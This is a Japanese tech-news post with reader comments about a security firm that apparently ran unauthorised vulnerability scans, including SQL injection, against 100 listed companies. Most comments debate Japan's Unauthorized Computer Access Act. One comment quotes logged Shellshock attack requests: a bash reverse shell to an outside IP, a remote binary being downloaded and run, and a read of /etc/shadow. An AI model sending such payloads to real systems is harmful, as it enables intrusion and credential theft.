とあるセキュリティ企業、上場企業100社に対し無断で攻撃を行っていた？

とあるセキュリティ企業、上場企業100社に対し無断で攻撃を行っていた？ 41

ストーリー by hylom 2014年10月23日 8時00分
続報はないのだろうか部門より

あるAnonymous Coward 曰く、

セキュリティ関連ビジネスを手がけるsproutが、上場企業100社に対し無断で攻撃を行っていたのではないかという疑惑が出ている。
発端は雑誌「FACTA」の2014年11月号掲載記事『上場企業5割に「サイバー脆弱性」』。会員限定の記事なので本文全文は閲覧できないが、sproutの公式Twitterによると、「本日発売の経済誌FACTAに、スプラウトが行った上場企業100社のサイバー脆弱性調査が掲載されました。」とのことで、sprout社が上場企業100社に対し、無断で「サイバー脆弱性調査」を行ったようだ。
しかし、脆弱性調査を行う場合、通常は調査対象の同意や事前の調整・準備が必要となる。調査を行うためには攻撃を行う必要があり、それによってデータの消失や改変などの被害が発生する可能性があるからだ（過去記事）。そのため、相手に無断で調査を行った場合、その内容によっては不正アクセス禁止法に抵触する可能性がある。
これに対し、早速セキュリティ研究家の高木浩光氏が「「危険度高脆弱性の種類 SQLインジェクション」のテストは不正アクセス禁止法に抵触しない方法で行なえたのですか」とツッコミを入れている。

この議論は賞味期限が切れたので、アーカイブ化されています。新たにコメントを付けることはできません。

記事ページを表示すべてのコメント取得

検索41コメント Log In/Create an Account

スプラウトさんはTwitterを使っています: (スコア:4, おもしろおかしい)

by Anonymous Coward on 2014年10月23日 10時34分 (#2698684)

https://twitter.com/sprout_group [twitter.com]
インターネット・セキュリティ事件を呟きます
だそうで。
呟いたんですね。インターネット・セキュリティ事件を。自社だけど。マッチポンプだけど。
簡単に調査できるからこそ (スコア:2)

by iwakuralain (33086) on 2014年10月23日 9時30分 (#2698658)

そういった方面の意識が低すぎるのかも。
込み入った調査なんかは実際にシステムを把握したうえでやらないといけないけど
ツールなんかで表面をさらうだけならサクっと出来ちゃうからやっちゃったのかな。
# 既知のセキュリティーホールが残ってる程度の報告ならまだしもそうじゃないっぽいし
ShellShockスキャナは結構来ていた (スコア:2, 興味深い)

by Anonymous Coward on 2014年10月23日 12時40分 (#2698748)

自分の所のログを出すのは気が引けるので、他所の記事ですが。
http://www.agilegroup.co.jp/technote/modsec-crs-shellshock.html [agilegroup.co.jp]
＞c2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [26/Sep/2014:18:10:52 +0900] "GET / HTTP/1.1" 302 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
＞202.38.120.248 - - [26/Sep/2014:20:37:24 +0900] "GET / HTTP/1.0" 302 - "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
＞109.95.210.196 - - [26/Sep/2014:22:20:18 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 262 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesain/ [singlesain]
＞83.166.234.133 - - [27/Sep/2014:13:57:37 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://agilegroup.co.jp/ [dipad.biz]\""
＞217.72.242.16 - - [28/Sep/2014:22:34:59 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
＞125.206.224.161 - - [29/Sep/2014:10:29:08 +0900] "GET /technote/modsec-crs-shellshock.html HTTP/1.1" 400 226 "-" "() { :;}; /bin/more /etc/shadow"
こういうのも軒並み「不正アクセス禁止法」に抵触なんですかね？
うちのようなこじんまりやってるVPSサーバーでも国内のIPからも結構アクセスありましたし。
情報開示請求でも出して告発した方がいいんでしょうか？
- Re: (スコア:0)
  
  by Anonymous Coward
  
  抵触でしょうね。それに限らず、他のパターンも昔からいっぱい来てますが。
  - Re:ShellShockスキャナは結構来ていた (スコア:1)
    
    by Anonymous Coward on 2014年10月23日 13時14分 (#2698782)
    
    不正アクセス禁止法に未遂罪はないので、脆弱性があって成功していた場合だけですね。
    
    シェア
    
    親コメント
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    スキャン成功してるの？
    成功しなければ未遂なので抵触はしないですよ。
    もちろん道徳的に未遂が許されるわけではないですが。
リテラシィ研究科に煽り入れてもらえみたいな (スコア:1)

by Anonymous Coward on 2014年10月23日 10時01分 (#2698672)

御社のポリシーどうなってんの？
と某掲示板並に容赦なく煽り入れてもらえば
自分らがなにしたのか
理解できるようになるんではないのかな
# ハムラビメソッド横レス編
まだ決まったわけじゃない (スコア:1)

by Anonymous Coward on 2014年10月23日 11時54分 (#2698729)

SQLインジェクションの脆弱性があるかの確認方法は、必ずしも不正アクセス禁止法違反を犯さないとできないわけではありません。不正アクセス禁止法違反を犯さない方法でアクセスして、画面の表示を見て「疑わしい」場合を見つけることができる時もあります。ただし、その方法では、あくまでも疑わしいというだけで、脆弱性があることを証明できたわけではありません。しかし、FACTA誌は、危険度高の脆弱性があると断言して特定の企業の信頼を貶めるような文体の記事を出して来ています。
つまり次のどちらかということになるかと。
A. 不正アクセス禁止法違反の方法で脆弱性を確実に突き止めたので、FACTA誌の記事の内容は事実として正しい。
B. 不正アクセス禁止法違反でない方法で脆弱性が存在する可能性を大まかに推定したものなので、FACTA誌の記事は事実でない可能性のあることを事実として報じたもので、名誉毀損や信用毀損に当たるおそれがある。
- 行えますよ (スコア:0)
  
  by Anonymous Coward
  
  ＞「危険度高脆弱性の種類 SQLインジェクション」のテストは不正アクセス禁止法に抵触しない方法で行なえたのですか
  双方が合意・締結し正規の依頼に則れば合法ですが。
  # まさか無断で合法に不正アクセスする方法を聞いてはいないよね？
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    ハア？無断が前提の話でしょ？
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    法律も完璧じゃないから、無断で合法な悪意のあるアクセスが出来る場合もあるよってのが元コメでしょ。まさかでもなく聞いてもいない。
- Re: (スコア:0)
  
  by Anonymous Coward
  
  仮にその「疑わしい」程度の確認で「脆弱性」と発表するのが信じられません。
  単に脆弱性のあるバージョンのビルド番号が返ってきたからといって、そのサーバーが脆弱であるとは限らないでしょう？
  勝手に脆弱と決めつけるくせに、「疑わしい」と主観で判断したのが根拠だとしたら、それこそ大問題です。
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    ちなみに、FACTAの独断とするならスプラウト某がしっかり否定しないとダメでしょう。
- Re: (スコア:0)
  
  by Anonymous Coward
  
  ユーザー名やパスワードに引用符を入れるとPHP Warning: mysql_～とか出てきちゃうサイトが沢山あったのかも知れない。
  引用符がエスケープされてないなら、不正ログインを行うクエリも作れるでしょう。
不思議はない (スコア:0, 荒らし)

by Anonymous Coward on 2014年10月23日 9時24分 (#2698654)

暴走族あがりが白バイ乗ってるのとおなじで
セキュリティ関連ビジネスなんてクラッカーあがりがやる仕事でしょ。
っていうか (スコア:0)

by Anonymous Coward on 2014年10月23日 10時06分 (#2698674)

余計なお世話。
ありがた迷惑。
少なくとも「無駄なトラフィックを勝手に作った」ことを反省して欲しい。
- Re:っていうか (スコア:1)
  
  by Anonymous Coward on 2014年10月23日 11時20分 (#2698703)
  
  ×無駄なトラフィックを勝手に作った
  ○無駄な仕事を勝手に作った
  攻撃を受けた会社は、影響調査やんなきゃなんないからね。
  攻撃の種類が不明瞭だから、あらゆる攻撃を想定して調査しなきゃならない。
  すっげぇー面倒だよ。
  
  シェア
  
  親コメント
- Re: (スコア:0)
  
  by Anonymous Coward
  
  「違法行為」は「迷惑」の大まかにサブセットだから別にいいじゃん
  迷惑の中でも特に迷惑だから違法なのさ
SQLインジェクションのテストが駄目なら (スコア:0)

by Anonymous Coward on 2014年10月23日 10時50分 (#2698690)

パラメータに半角のシングルクオートを含めるのは、SQLインジェクションの可能性を発見できてしまう可能性があるから、全部違法なの？
- Re:SQLインジェクションのテストが駄目なら (スコア:4, 興味深い)
  
  by TarZ (28055) on 2014年10月23日 11時37分 (#2698715) 日記
  
  不正アクセス禁止法の対象は故意犯で、過失は含まれない。
  今回の件は意図して（アタック先にSQLインジェクション脆弱性があり、それを引き起こす可能性があることを前提とした上で）アタックしているので故意。事前にアタック先と調整していないので、「業務その他正当な理由による場合」による除外対象となるかも微妙。
  …というところですかね。
  
  シェア
  
  親コメント
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    不正アクセス行為の禁止等に関する法律　二条四項を見る限り。
    自身の識別符号（ID）を入力した上で構文状のパスワードを入力する体裁のSQLインジェクション脆弱性検査であれば、
    法の要求する用件を満たさないため犯罪にならないような。
    - Re:SQLインジェクションのテストが駄目なら (スコア:2)
      
      by Y-taro (38255) on 2014年10月24日 20時20分 (#2699781)
      
      セキュリティホールへの攻撃等として不正アクセス禁止法第2条第4項第2号が規定しているのは
      「特定利用の制限を免れることができる情報（識別符号であるものを除く。）又は指令を入力して――」
      ですね。
      この前者については、送信したデータの中に「識別符号」が含まれていたとしても、データ全体から「識別符号」やその他の攻撃に無関係な情報（通常のHTTPヘッダやPOSTデータ）を除いた部分が、「特定利用の制限を免れることができる情報」として扱われるんじゃないでしょうか。
      また、後者の「特定利用の制限を免れることができる指令」については、「識別符号であるものを除く」という規定はありませんから、「指令」の動作として必要であれば、「識別符号」も含めて「指令」とすることに問題はないでしょう。
      「指令」の動作に必要ないのであれば、前者同様に、攻撃に無関係な情報として切り分けられるように思います。
      ところで、SQLインジェクションなら、SQL構文自体が動作を規定するものだから、「指令」の方に当たるように感じます。
      
      シェア
      
      親コメント
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    （不正指令電磁的記録作成等）
    第百六十八条の二　正当な理由がないのに、人の電子計算機における実行の用に供する目的で、次に掲げる電磁的記録その他の記録を作成し、又は提供した者は、三年以下の懲役又は五十万円以下の罰金に処する。
    一　人が電子計算機を使用するに際してその意図に沿うべき動作をさせず、又はその意図に反する動作をさせるべき不正な指令を与える電磁的記録
    こっちはどうなんでしょう？
    - Re: (スコア:0)
      
      by Anonymous Coward
      
      そっちはウイルスを送りつけて、先方に実行させようとする場合です。
      脆弱性検査ではそういうことはしないですね。
- Re:SQLインジェクションのテストが駄目なら (スコア:1)
  
  by Anonymous Coward on 2014年10月23日 10時55分 (#2698691)
  
  子供か。常識で考えるか、きちんと法律の勉強をするか、どちらかをしろ。どちらでも答えは出るぞ。
  
  シェア
  
  親コメント
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    常識に反する法律なんていっぱいあるので、
    キチンと法律を勉強しないとだめなんですよね。。。
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    常識が移ろいゆくものだという常識もお忘れなく
    非常識を裁くのには常識だけじゃ不足するので
    法に纏わる文は難解だったり
    世間の非常識な意味だったりするんです
    法に長けた方ほど世間知らずだったりするものなのですよ
    # 正義とは悪を収穫する営みである
  - - Re: (スコア:0)
      
      by Anonymous Coward
      
      ということにしたいのですね
- Re: (スコア:0)
  
  by Anonymous Coward
  
  SQLの内容によっては電子計算機損壊等業務妨害罪に問われることもあるかと
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    でもどうだろう。
    やる側は壊す目的はないはずで、やはり脆弱なシステムを作った側の責任も大きいと思うけどなぁ。
    ブレーキ壊れた自動車を試乗させて、事故させて、壊したから金払え、って言ってるような。
    ブレーキ壊れてるかは踏まないとわからない。
    もし自分が大切な情報を預けるサービスなら、そういうとこきっちりやってもらいたいし、事前に調べる、っていうもあってもいいのかもしれない。
    まぁ現行法ではアウトなんだろうけど、その辺もまだ法律がネットに追いついてない気がするなぁ。
- Re: (スコア:0)
  
  by Anonymous Coward
  
  関連リンクにあるが
  パスワードリセット画面のメールアドレス欄に入力したアドレスに、誤って「+」が入っていたために全ユーザのパスワードリセットが動いたそうな。
  故意にやれば、器物損壊や威力業務妨害にあたると思われる。
  タレコミにある不正アクセス禁止法というのは、インジェクションにより、アクセス制限を回避した場合かな。
- Re: (スコア:0)
  
  by Anonymous Coward
  
  「村田巨人」で検索するとバグるサイトもあったりしますから、過失でも違法だったら何も出来ませんね
無断でやったという根拠は？ (スコア:0)

by Anonymous Coward on 2014年10月23日 11時42分 (#2698717)

> 無断で「サイバー脆弱性調査」を行ったようだ。
事前に許可を得たという話も聞こえてこないが、得ていないという話も聞こえてこない。
- Re:無断でやったという根拠は？ (スコア:1)
  
  by Anonymous Coward on 2014年10月23日 11時45分 (#2698724)
  
  FACTA誌の記事を読むと、無断のようですね。事後に通告して、記事書くまでにどういう返事が来たか、来なかったかを記事にしてる。
  
  シェア
  
  親コメント
- Re:無断でやったという根拠は？ (スコア:1)
  
  by Anonymous Coward on 2014年10月23日 11時48分 (#2698727)
  
  上場上位100社全社の許可を得れたスプラウトマジっぱねぇ！
  こうですか＞＜
  
  シェア
  
  親コメント
  - Re: (スコア:0)
    
    by Anonymous Coward
    
    上位100社なんでしたっけ？
    - Re: (スコア:0)
      
      by Anonymous Coward
      
      あっ！？
      とおもた。かんちがいしてた。
QUERY STRINGってなんでもありでは (スコア:0)

by Anonymous Coward on 2014年10月23日 15時18分 (#2698875)

GETでURLについてる値やPOSTでformタグの中に書かれてるようなものなんて、クライアント側でいくらでも書き換えが可能であり、
サーバー側はどんな値が来ても対処できるような作りにしておくべきなのは絶対的な鉄則。
それがSQLに作用する文字列だろうがなんだろうが、受け手側の問題であり、送信者側を責めるのはおかしいと思うけどなぁ。
もし、どうしてもサービス側が指定したものしか入力させたくないというなら、最初からサービス側が選択肢を用意して、サーバーには数値しか送れないようにしておくべきでは。文字列も全て選択肢にするか、「あ」を1、「い」を2みたいにするとか。
それが嫌ならもうQUERY STRING書き換えも違法、とでもすればいいよ。
通常のアクセスだろうが調査目的のアクセスだろうが、無駄に大量アクセスして過大な負荷をかけるのは別の話(違法でいい)。
- 俺達は試されている (スコア:0)
  
  by Anonymous Coward
  
  FACTAのログインフォームが、どうも俺達を試しているような気がするんだ。
  き、君が、た、試してみてくれ。
- Re: (スコア:0)
  
  by Anonymous Coward
  
  呼び鈴がついてるからってピンポンダッシュしてもいいってもんじゃないでしょ。

より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。

スプラウトさんはTwitterを使っています: (スコア:4, おもしろおかしい)

簡単に調査できるからこそ (スコア:2)

ShellShockスキャナは結構来ていた (スコア:2, 興味深い)

Re: (スコア:0)

Re:ShellShockスキャナは結構来ていた (スコア:1)

Re: (スコア:0)

リテラシィ研究科に煽り入れてもらえみたいな (スコア:1)

まだ決まったわけじゃない (スコア:1)

行えますよ (スコア:0)

Re: (スコア:0)

Re: (スコア:0)

Re: (スコア:0)

Re: (スコア:0)

Re: (スコア:0)

不思議はない (スコア:0, 荒らし)

っていうか (スコア:0)

Re:っていうか (スコア:1)

Re: (スコア:0)

SQLインジェクションのテストが駄目なら (スコア:0)

Re:SQLインジェクションのテストが駄目なら (スコア:4, 興味深い)

Re: (スコア:0)

Re:SQLインジェクションのテストが駄目なら (スコア:2)

Re: (スコア:0)

Re: (スコア:0)

Re:SQLインジェクションのテストが駄目なら (スコア:1)

Re: (スコア:0)

Re: (スコア:0)

Re: (スコア:0)

Re: (スコア:0)

Re: (スコア:0)

Re: (スコア:0)

Re: (スコア:0)

無断でやったという根拠は？ (スコア:0)

Re:無断でやったという根拠は？ (スコア:1)

Re:無断でやったという根拠は？ (スコア:1)

Re: (スコア:0)

Re: (スコア:0)

QUERY STRINGってなんでもありでは (スコア:0)

俺達は試されている (スコア:0)

Re: (スコア:0)